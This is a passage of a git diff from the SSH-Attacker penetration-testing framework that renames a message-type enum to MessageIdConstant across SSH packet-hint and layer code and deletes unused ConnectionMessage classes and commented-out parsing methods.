PacketLayerHint(MessageIdConstant.SSH_MSG_KEXRSA_PUBKEY); case SSH_MSG_KEXRSA_SECRET: LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_SECRET Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_SECRET); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXRSA_SECRET); case SSH_MSG_KEXRSA_DONE: LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_DONE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_DONE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXRSA_DONE); case SSH_MSG_KEXGSS_INIT: LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_INIT Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_INIT); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_INIT); case SSH_MSG_KEXGSS_CONTINUE: LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_CONTINUE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_CONTINUE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_CONTINUE); case SSH_MSG_KEXGSS_COMPLETE: LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_COMPLETE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_COMPLETE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_COMPLETE); case SSH_MSG_KEXGSS_HOSTKEY: LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_HOSTKEY Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_HOSTKEY); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_HOSTKEY); case SSH_MSG_KEXGSS_ERROR: LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_ERROR Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_ERROR); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_ERROR); case SSH_MSG_KEXGSS_GROUPREQ: LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_GROUPREQ Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_GROUPREQ); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_GROUPREQ); case SSH_MSG_KEXGSS_GROUP: LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_GROUP Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_GROUP); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_KEXGSS_GROUP); case SSH_MSG_USERAUTH_REQUEST: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_REQUEST Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_REQUEST); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_REQUEST); case SSH_MSG_USERAUTH_FAILURE: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_FAILURE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_FAILURE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_FAILURE); case SSH_MSG_USERAUTH_SUCCESS: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_SUCCESS Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_SUCCESS); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_SUCCESS); case SSH_MSG_USERAUTH_BANNER: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_BANNER Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_BANNER); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_BANNER); case SSH_MSG_USERAUTH_PK_OK: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_PK_OK Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_PK_OK); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_PK_OK); case SSH_MSG_USERAUTH_PASSWD_CHANGEREQ: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_PASSWD_CHANGEREQ Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_PASSWD_CHANGEREQ); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_PASSWD_CHANGEREQ); case SSH_MSG_USERAUTH_INFO_REQUEST: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_INFO_REQUEST Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_INFO_REQUEST); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_INFO_REQUEST); case SSH_MSG_USERAUTH_INFO_RESPONSE: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_INFO_RESPONSE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_INFO_RESPONSE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_INFO_RESPONSE); case SSH_MSG_USERAUTH_GSSAPI_RESPONSE: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_RESPONSE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_RESPONSE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_RESPONSE); case SSH_MSG_USERAUTH_GSSAPI_TOKEN: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_TOKEN Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_TOKEN); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_TOKEN); case SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE Hint"); return new PacketLayerHint( - ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); + MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); case SSH_MSG_USERAUTH_GSSAPI_ERROR: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERROR Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_ERROR); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_ERROR); case SSH_MSG_USERAUTH_GSSAPI_ERRTOK: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERRTOK Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_ERRTOK); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_ERRTOK); case SSH_MSG_USERAUTH_GSSAPI_MIC: LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_MIC Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_MIC); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_USERAUTH_GSSAPI_MIC); case SSH_MSG_GLOBAL_REQUEST: LOGGER.debug("[bro] returning SSH_MSG_GLOBAL_REQUEST Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_GLOBAL_REQUEST); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_GLOBAL_REQUEST); case SSH_MSG_REQUEST_SUCCESS: LOGGER.debug("[bro] returning SSH_MSG_REQUEST_SUCCESS Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_REQUEST_SUCCESS); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_REQUEST_SUCCESS); case SSH_MSG_REQUEST_FAILURE: LOGGER.debug("[bro] returning SSH_MSG_REQUEST_FAILURE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_REQUEST_FAILURE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_REQUEST_FAILURE); case SSH_MSG_CHANNEL_OPEN: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_OPEN); case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_CONFIRMATION Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_CONFIRMATION); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_OPEN_CONFIRMATION); case SSH_MSG_CHANNEL_OPEN_FAILURE: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_FAILURE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_FAILURE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_OPEN_FAILURE); case SSH_MSG_CHANNEL_WINDOW_ADJUST: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_WINDOW_ADJUST Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_WINDOW_ADJUST); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_WINDOW_ADJUST); case SSH_MSG_CHANNEL_DATA: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_DATA Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_DATA); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_DATA); case SSH_MSG_CHANNEL_EXTENDED_DATA: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_EXTENDED_DATA Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_EXTENDED_DATA); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_EXTENDED_DATA); case SSH_MSG_CHANNEL_EOF: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_EOF Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_EOF); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_EOF); case SSH_MSG_CHANNEL_CLOSE: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_CLOSE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_CLOSE); case SSH_MSG_CHANNEL_REQUEST: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_REQUEST Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_REQUEST); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_REQUEST); case SSH_MSG_CHANNEL_SUCCESS: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_SUCCESS Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_SUCCESS); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_SUCCESS); case SSH_MSG_CHANNEL_FAILURE: LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_FAILURE Hint"); - return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_FAILURE); + return new PacketLayerHint(MessageIdConstant.SSH_MSG_CHANNEL_FAILURE); case UNKNOWN: LOGGER.debug("[bro] returning UNKNOWN Hint"); - return new PacketLayerHint(ProtocolMessageType.UNKNOWN); + return new PacketLayerHint(MessageIdConstant.UNKNOWN); default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 62265fb76..ec55b66b8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -39,7 +39,7 @@ public class SSH1Layer extends ProtocolLayer configuration = getLayerConfiguration(); - ProtocolMessageType runningProtocolMessageType = null; + MessageIdConstant runningProtocolMessageType = null; ByteArrayOutputStream collectedMessageStream = new ByteArrayOutputStream(); if (configuration != null) { LOGGER.debug( @@ -81,7 +81,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { LOGGER.debug("[bro] here i am with sending the message"); - runningProtocolMessageType = message.getProtocolMessageType(); + runningProtocolMessageType = message.getMessageIdConstant(); processMessage(message, collectedMessageStream); addProducedContainer(message); flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); @@ -96,7 +96,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { if (runningProtocolMessageType == null) { LOGGER.debug("[bro] Protocol Message Type is null!"); } else { - LOGGER.debug("ProtocolMessageType: {}", runningProtocolMessageType.getValue()); + LOGGER.debug("ProtocolMessageType: {}", runningProtocolMessageType.getId()); } LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); @@ -157,7 +157,7 @@ public LayerProcessingResult receiveData() { LayerProcessingHint tempHint = dataStream.getHint(); if (tempHint == null) { LOGGER.warn( - "The TLS message layer requires a processing hint. E.g. a record type. Parsing as an unknown message"); + "The SSH message layer requires a processing hint. E.g. a record type. Parsing as an unknown message"); readUnknownProtocolData(); } else if (tempHint instanceof PacketLayerHint) { PacketLayerHint hint = (PacketLayerHint) dataStream.getHint(); @@ -177,13 +177,6 @@ public LayerProcessingResult receiveData() { public void readMessageForHint(PacketLayerHint hint) { switch (hint.getType()) { // use correct parser for the message - - case AUTHENTICATION: - readAuthenticationProtocolData(); - break; - case CONNECTION: - readConnectionProtocolData(); - break; case ASCII_MESSAGE: readASCIIData(); break; @@ -800,11 +793,6 @@ private void readVersionExchangeProtocolData() { readDataContainer(message, context); } - private void readConnectionProtocolData() { - ConnectionMessage message = new ConnectionMessage(); - readDataContainer(message, context); - } - /** * Parses the handshake layer header from the given message and parses the encapsulated message * using the correct parser. diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index ab323af6a..444274db0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -10,7 +10,6 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.ModifiableVariableProperty; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.DataContainer; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; @@ -51,16 +50,6 @@ public void setCleanProtocolMessageBytes(ModifiableByteArray cleanProtocolMessag @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) private ModifiableByteArray cleanProtocolMessageBytes; - public ProtocolMessageType getContentMessageType() { - return contentMessageType; - } - - public void setContentMessageType(ProtocolMessageType contentMessageType) { - this.contentMessageType = contentMessageType; - } - - private ProtocolMessageType contentMessageType; - public AbstractPacket() {} public ModifiableByteArray getCompletePacketBytes() { @@ -114,13 +103,5 @@ public void setPayload(byte[] payload) { this.payload = ModifiableVariableFactory.safelySetValue(this.payload, payload); } - /* public abstract AbstractPacketPreparator getPacketPreparator( - Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor); - - public abstract AbstractPacketParser getPacketParser( - byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber); - - public abstract AbstractPacketSerializer getPacketSerializer();*/ - public abstract void prepareComputations(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java index 530ce1991..a79bbfbe5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java @@ -21,56 +21,6 @@ public BinaryPacketLayer(SshContext context) { super(context); } - /*@Override - public PacketLayerParseResult parsePacket(byte[] rawBytes, int startPosition) - throws ParserException { - try { - BinaryPacketParser parser = - new BinaryPacketParser( - rawBytes, - startPosition, - getDecryptorCipher(), - context.getReadSequenceNumber()); - BinaryPacket packet = parser.parse(); - decryptPacket(packet); - decompressPacket(packet); - return new PacketLayerParseResult(packet, parser.getPointer() - startPosition); - } catch (ParserException e) { - throw new ParserException("Could not parse provided data as binary packet", e); - } - } - - @Override - public PacketLayerParseResult parsePacketSoftly(byte[] rawBytes, int startPosition) { - try { - BinaryPacketParser parser = - new BinaryPacketParser( - rawBytes, - startPosition, - getDecryptorCipher(), - context.getReadSequenceNumber()); - BinaryPacket packet = parser.parse(); - decryptPacket(packet); - decompressPacket(packet); - return new PacketLayerParseResult(packet, parser.getPointer() - startPosition, true); - } catch (ParserException e) { - LOGGER.debug("Could not parse binary packet, parsing as blob"); - LOGGER.trace(e); - try { - BlobPacketParser parser = new BlobPacketParser(rawBytes, startPosition); - BlobPacket packet = parser.parse(); - decryptPacket(packet); - decompressPacket(packet); - return new PacketLayerParseResult( - packet, parser.getPointer() - startPosition, true); - } catch (ParserException ex) { - LOGGER.warn("Could not parse data as blob packet, dropping remaining bytes"); - LOGGER.trace(ex); - return new PacketLayerParseResult(null, rawBytes.length - startPosition, true); - } - } - }*/ - @Override protected void decryptPacket(AbstractPacket packet) { if (!(packet instanceof BinaryPacket)) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java deleted file mode 100644 index 6b574c61a..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.handler; - -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionMessageHandler extends ProtocolMessageHandler { - - private static final Logger LOGGER = LogManager.getLogger(); - - public ConnectionMessageHandler(SshContext context) { - super(context); - } - - @Override - public void adjustContext(ConnectionMessage message) { - sshContext.setLastHandledApplicationMessageData(message.getData().getValue()); - String readableAppData = - ArrayConverter.bytesToHexString( - sshContext.getLastHandledAuthenticationMessageData()); - if (sshContext.getTalkingConnectionEndType() - == sshContext.getChooser().getMyConnectionPeer()) { - LOGGER.debug("Received Data:" + readableAppData); - } else { - LOGGER.debug("Send Data:" + readableAppData); - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java index b1509ceaa..fee7ade82 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java @@ -11,7 +11,6 @@ import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.modifiablevariable.util.UnformattedByteArrayAdapter; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.AuthenticationMessageHandler; import de.rub.nds.sshattacker.core.protocol.authentication.parser.AuthenticationMessageParser; @@ -31,12 +30,10 @@ public class AuthenticationMessage extends ProtocolMessage { private ModifiableInteger languageTagLength; private ModifiableString languageTag; - public ModifiableByteArray getData() { - return data; - } - - public void setData(ModifiableByteArray data) { - this.data = data; - } - - public void setData(byte[] data) { - if (this.data == null) { - this.data = new ModifiableByteArray(); - } - this.data.setOriginalValue(data); - } - - @ModifiableVariableProperty private ModifiableByteArray data; - public ModifiableInteger getMessageLength() { return messageLength; } @@ -70,6 +53,10 @@ public void setMessage(String message) { setMessage(message, false); } + public void setMessage(byte[] message) { + setMessage(new String(message,StandardCharsets.UTF_8), false); + } + public void setMessage(ModifiableString message, boolean adjustLengthField) { this.message = message; if (adjustLengthField) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java index 00487f148..2b146b4e9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java @@ -40,8 +40,8 @@ public void parse(UserAuthBannerMessage message) { } private void parseData(UserAuthBannerMessage msg) { - msg.setData(parseByteArrayField(getBytesLeft())); - LOGGER.debug("Data: {}", msg.getData().getValue()); + msg.setMessage(parseByteArrayField(getBytesLeft())); + LOGGER.debug("Data: {}", msg.getMessage().getValue()); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java index f51653003..5888ec265 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java @@ -11,9 +11,9 @@ import de.rub.nds.modifiablevariable.ModifiableVariableProperty; import de.rub.nds.modifiablevariable.bool.ModifiableBoolean; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.layer.Message; +import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; import jakarta.xml.bind.annotation.XmlAccessType; import jakarta.xml.bind.annotation.XmlAccessorType; import jakarta.xml.bind.annotation.XmlTransient; @@ -23,7 +23,7 @@ @XmlAccessorType(XmlAccessType.FIELD) public abstract class ProtocolMessage> - extends Message { + extends ModifiableVariableHolder implements DataContainer { /** content type */ @XmlTransient protected final boolean GOING_TO_BE_SENT_DEFAULT = true; @@ -50,16 +50,16 @@ public abstract class ProtocolMessage> @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) protected ModifiableByteArray completeResultingMessage; - public ProtocolMessageType getProtocolMessageType() { - return protocolMessageType; + public MessageIdConstant getMessageIdConstant() { + return messageIdConstant; } - public void setProtocolMessageType(ProtocolMessageType protocolMessageType) { - this.protocolMessageType = protocolMessageType; + public void setMessageIdConstant(MessageIdConstant MessageIdConstant) { + this.messageIdConstant = MessageIdConstant; } /** content type */ - @XmlTransient protected ProtocolMessageType protocolMessageType; + @XmlTransient protected MessageIdConstant messageIdConstant; public ProtocolMessage() {} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java deleted file mode 100644 index 3c308c35b..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/layer/MessageLayer.java +++ /dev/null @@ -1,47 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.common.layer; - -import de.rub.nds.sshattacker.core.constants.PacketLayerType; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.packet.BinaryPacket; -import de.rub.nds.sshattacker.core.packet.BlobPacket; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.state.Context; - -public class MessageLayer { - - private final Context context; - - public MessageLayer(Context context) { - this.context = context; - } - - /*public ProtocolMessage parse(AbstractPacket packet) { - return ProtocolMessageParser.delegateParsing(packet, context); - }*/ - - /*public Stream> parse(Stream packetStream) { - return packetStream.map(this::parse); - }*/ - - public AbstractPacket serialize(ProtocolMessage message) { - AbstractPacket packet; - if (context.getPacketLayerType() == PacketLayerType.BLOB) { - packet = new BlobPacket(); - } else { - packet = new BinaryPacket(); - } - packet.setPayload(message.getSerializer(context.getSshContext()).serialize()); - return packet; - } - - /*public Stream serialize(Stream> messageStream) { - return messageStream.map(this::serialize); - }*/ -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java deleted file mode 100644 index 063de2e75..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java +++ /dev/null @@ -1,129 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.connection.message; - -import de.rub.nds.modifiablevariable.ModifiableVariableProperty; -import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.modifiablevariable.util.UnformattedByteArrayAdapter; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.authentication.handler.ConnectionMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ConnectionMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ConnectionMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ConnectionMessageSerializer; -import jakarta.xml.bind.annotation.adapters.XmlJavaTypeAdapter; -import java.io.InputStream; -import java.util.Arrays; - -public class ConnectionMessage extends ProtocolMessage { - @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) - private byte[] dataConfig = null; - - @ModifiableVariableProperty private ModifiableByteArray data; - - public ConnectionMessage(byte[] dataConfig) { - super(); - this.dataConfig = dataConfig; - this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; - } - - public ConnectionMessage() { - super(); - this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; - } - - public ModifiableByteArray getData() { - return data; - } - - public void setData(ModifiableByteArray data) { - this.data = data; - } - - public void setData(byte[] data) { - if (this.data == null) { - this.data = new ModifiableByteArray(); - } - this.data.setOriginalValue(data); - } - - public byte[] getDataConfig() { - return dataConfig; - } - - public void setDataConfig(byte[] dataConfig) { - this.dataConfig = dataConfig; - } - - @Override - public String toString() { - StringBuilder sb = new StringBuilder(); - sb.append("ApplicationMessage:"); - sb.append("\n Data: "); - if (data != null && data.getValue() != null) { - sb.append(ArrayConverter.bytesToHexString(data.getValue())); - } else { - sb.append("null"); - } - return sb.toString(); - } - - @Override - public String toCompactString() { - return "APPLICATION"; - } - - @Override - public String toShortString() { - return "APP"; - } - - @Override - public ConnectionMessageHandler getHandler(SshContext sshContext) { - return new ConnectionMessageHandler(sshContext); - } - - @Override - public ConnectionMessageParser getParser(SshContext sshContext, InputStream stream) { - return new ConnectionMessageParser(stream); - } - - @Override - public ConnectionMessagePreparator getPreparator(SshContext sshContext) { - return new ConnectionMessagePreparator(sshContext.getChooser(), this); - } - - @Override - public ConnectionMessageSerializer getSerializer(SshContext sshContext) { - return new ConnectionMessageSerializer(this); - } - - @Override - public int hashCode() { - int hash = 7; - hash = 43 * hash + Arrays.hashCode(this.dataConfig); - return hash; - } - - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - if (obj == null) { - return false; - } - if (getClass() != obj.getClass()) { - return false; - } - final ConnectionMessage other = (ConnectionMessage) obj; - return Arrays.equals(this.dataConfig, other.dataConfig); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java deleted file mode 100644 index 41ab0b38a..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java +++ /dev/null @@ -1,45 +0,0 @@ -/* - * SSH-Attacker - A Modular 